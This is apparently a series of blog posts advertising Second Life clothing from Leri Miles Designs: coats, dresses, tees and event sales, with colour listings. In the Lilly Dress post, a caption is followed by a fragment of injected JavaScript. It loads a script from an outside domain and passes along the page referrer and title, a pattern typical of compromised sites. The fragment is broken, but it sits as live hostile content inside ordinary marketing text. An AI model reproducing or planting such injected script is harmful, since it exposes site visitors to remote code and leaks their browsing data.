Leri Miles Designs Covers 60L Weekend In A Warm Pea Coat

LMD Ad MP Pea Coat Addict Pack


This weekend we at Leri Miles Designs are offering our Houndstooth Pea Coat for our 60L Weekend Special. For this weekend it’s only 60L each for the this mesh coat in it’s rainbow of 12 colours. Grab it before it goes up to it’s post sale price!

LMD Ad MP Pea Coat MESH Black-Aqua

Black and Aqua

LMD Ad MP Pea Coat MESH Blue Houndstooth-Black & White

Blue and Black & White

LMD Ad MP Pea Coat MESH Cinnamon Houndstooth-Green

Cinnamon & Green

LMD Ad MP Pea Coat MESH Lilac Houndstooth-Mocha

Lilac and Mocha

LMD Ad MP Pea Coat MESH Periwinkle Houndstooth-Pink

Periwinkle and Pink

LMD Ad MP Pea Coat MESH Pumpkin Houndstooth-White & Black

Pumpkin and White & Black

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Leri Miles Designs’ Lilly Makes It’s Way To SLebrity SLection Street Sale

LMD Ad Display Lilly Dress


Leri Miles Designs has put one of my favourite dresses on sale this Tuesday at our SLebrity City sim Branch in the weekly Slebrity SLect Street Sale. We have the red version of our Lilly dress pictured above and below on sale for 50% off making it just 150L. This sale is just supose to be for one day but we have it on sale until we put the next item up for the next Street Sale

LMD Ad MP Lilly Dress Kiss Me Reds.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Leri Miles Designs Releases New V-Neck Tees For 60L Weekend

LMD Ad Display V Neck Tee Waves


This weekend we have a cute new top, out new mesh V-necked Tee comes in 8 pretty patterns that will add a bit of bright light colour to your fall. These are on sale for 60L right now as part of 60L Weekend. So pop down to Leri Miles Designs and pick up one, two or heck at this price pick up them all before the price goes up to the full store price.LMD Ad MP V Neck Tee Love-Pastel Flowers - Copy

 Love & Pastel Flower

LMD Ad MP V Neck Tee Rose-Stars

Rose & Stars

LMD Ad MP V Neck Tee Blush Polkadots-horz - Copy

Blush Polka Dots & Fall

LMD Ad MP V Neck Tee Stripes-horz

 Stripes & Waves

Arazome Makes An Appearance At SLebrity SLection Street Sale

LMD Ad Display Arazome MESH Dress


Above is a photo of the Leri Miles Designs’ Arazome dress being worn. We have picked one colour of this popular dress to put on sale for 50% off at the SLebrity SLection Street Sale.  We picked our Aqua version shown below which has lovely fallen leaf pattern which is appropriate for our SL fall, but in a unique colour palette that doesn’t make you feel trapped in a world of rusts and greens. This sale is suppose to be on for only a day but we leave ours up until the next weeks sales item goes up, so drop by and grab it today.


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Leri Miles Designs Joins The Thrift Shop

LMD Ad Display Brandi Tee Sky


Leri Miles Designs is now in one of the biggest discount events in SL Depraved Nation’s The Thrift Shop.  This giant sized discount event brings in some of the best shops in SL. We are going to be offering up a new release mesh top in both female and male versions named Brandi and Brandon. We are selling these shirts for just 75L for the duration of the sale, so you should get them before they come back to the store and go up to their normal price. The Thrift Shop closes down Dec 1st.

Here are the Brandi tops!

LMD Ad MP Brandi Tee Lime-Mint

Lime & Mint

LMD Ad MP Brandi Tee Peach-Pink

Peach & Pink

LMD Ad MP Brandi Tee Rouge-Sky

Rouge & Sky

LMD Ad MP Brandi Tee Latte-Lilac

Latte & Lilac

LMD Ad MP Brandi Tee Aqua-Butter

Aqua & Butter

LMDfM Ad Display Brandon Tee Latte

Here are the Brandon tops !

LMD Ad MP Brandon Tee Orange-PurpleOrange & Purple

LMD Ad MP Brandon Tee Red-Teal

Red & Teal

LMD Ad MP Brandon Tee Black-Blue

Black and Blue

LMD Ad MP Brandon Tee Brown-Hunter

Brown and Hunter

LMD Ad MP Brandon Tee Latte-Olive

Latte and Olive

Thriftshop Flyer 3.0 Nov 2013

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Leri Miles Designs Presents Josie For 60L Weekend

LMD Ad Display Josie Dress Lilac


Leri Miles Designs has created a newly released dress named Josie. The name Josie to me evokes a carefree fun 60’s and 70’s feel, and that is exactly what this bright satiny flowy dress brings.  This is a billowy design that moves and clings around you, the type of dress that works best with mesh. This dress is available in 10 beautiful fabrics and this weekend they are all on sale for just 60L as this is our special for 60L weekend.

LMD Ad MP Josie Dress Silver-Sky


Silver and Sky

LMD Ad MP Josie Dress Aqua-Blush

Aqua and Blush

LMD Ad MP Josie Dress Golden-Lilac

Golden and Lilac

LMD Ad MP Josie Dress Lime-Mint

Lime and Mint

LMD Ad MP Josie Dress Peachy-Rouge

Peachy and Rouge

Eclipse Sign

We also have a second outfit out for sale for 60L this weekend, is this single colour outfit called Eclipse, it comes with the sweater and skirt shown in the photo above but also with a pair of capris and a tank top that aren’t shown.

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Leri Miles Designs Unleashes Some Sexy For She & Him

LMD Ad Display Layered Skirt & Crop Sweater BW


Leri Miles Designs is in this month’s edition of She & Him  and we have brought a sexy top and skirt separates to the party. The top is called Cropped Sweater and you will find this sweater is destined to become one of your favourite pieces of clothing. It is an extremely versatile top that you will fit with almost everything you want to wear. The Layered Skirt rides low on the hips with a unique silver belt and pretty asymmetrical layers of vibrant fabric. Both come in 8 fabric choices for you to mix and match as you see fit. 

The skirt sells for 200L and the top for 150L. This round of She & Him runs until November 15th.

LMD Ad MP Crop Sweater Azure-Black

Azure and Black

LMD Ad MP Crop Sweater Pink-Red

Pink and Red

LMD Ad MP Crop Sweater Sage-Spice

Sage & Spice

LMD Ad MP Crop Sweater Teal-Violet

Teal & Violet

LMD Ad MP Layered Skirt Azure-Black

Azure and Black

LMD Ad MP Layered Skirt Pink-Red

Pink and Red

LMD Ad MP Layered Skirt Sage-Spice

Sage and Spice

LMD Ad MP Layered Skirt Teal-Violet

Teal and Violet


SLebrity SLection Street Sale

Claudia Blue Bandana Dress Display

Leri Miles Designs in their SLebrity Sim shop is taking part in the SLebrity SLection Street Sale this week. This is normally a one day sale on Tuesday but we keep our item up all week until the new item comes out. We are putting up our Claudia Dress in Blue Bandana that is pictured above.

LMD Ad MP Claudia Blue Bandana

Leri Miles Designs Helps You Release Your Inner Redneck

LMD Ad Display Dixie Rockabilly Fashion Fair Exclusive


This time of year it sometimes seems like all there is to look forward to is holidays, holidays and nothing but holidays. There is however one last chance in SL to have some pure unadulterated fun before you descend into the holiday season and that is the Rockabilly Fashion Fair! This fair has a bevy of vendors vying to help you let loose and show your inner country.

Leri Miles Designs has a shop in Section C of the Fair and Leri has made a few items that would be a great addition to anyone’s wardrobe. First for girls we have the outfit pictured above, her Dixie Top and Dixie Capris.  These items come in 8 different mix and match colours and sell for 175L a piece.  They are sold separately for more choice. 

LMD Ad MP Dixie Top Blueberry-Bubblegum

Blueberry and Bubblegum

LMD Ad MP Dixie Top BW-Cherry

Black & White and Cherry

LMD Ad MP Dixie Top Grape-Lime

Grape & Lime

LMD Ad MP Dixie Top Pumpkin-TealPumpkin & Teal

LMD Ad MP Dixie Capris Blueberry-Bubblegum

Blueberry & Bubblegum

LMD Ad MP Dixie Capris BW-Cherry

Black & White and Cherry

LMD Ad MP Dixie Capris Grape-Lime

Grape & Lime

LMD Ad MP Dixie Capris Pumpkin-Teal

Pumpkin and Teal

We also have a pair of hiking style boots in a light denim for men, called Billy Bob Boots that are exclusive to Rockabilly Fair and are only 99L

LMDforMen Ad MP Billy Bob Boots TRFF Exclusive

So check us out at Rockabilly Fair and pick up some of our great new exclusive designs before the fair ends November 23rd.


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Adding A Little Chocolate To The Dirty Turkey Hunt 4.0

LMD Ad Display Layered Skirt & Crop Sweater Chocolate


Leri Miles Designs is a part of The Dirty Turkey Hunt 4.0 which is on right now.  We are location number 5 in the hunt and our hint is ” On the floor near the sun, find vestment that sparkles and shines”. Our prize is the our Layed Skirt and our Cropped Sweater both in Chocolate. Who doesn’t need more chocolate in their lives. For more information about the Turkey Hunt check out their Blog